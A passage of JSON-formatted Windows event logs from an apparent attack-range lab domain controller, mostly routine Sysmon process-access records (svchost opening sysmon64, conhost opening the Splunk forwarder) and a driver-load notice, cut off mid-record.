{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.750\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010A1610300}\r\nSourceProcessId: 3716\r\nSourceThreadId: 3736\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.750","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010A1610300}","SourceProcessId":"3716","SourceThreadId":"3736","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7026,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76816,"ProcessID":856,"ThreadID":860,"Channel":"System","Message":"The following boot-start or system-start driver(s) did not load: \r\ncdrom\r\ndam","param1":"\r\ncdrom\r\ndam","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.766\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: 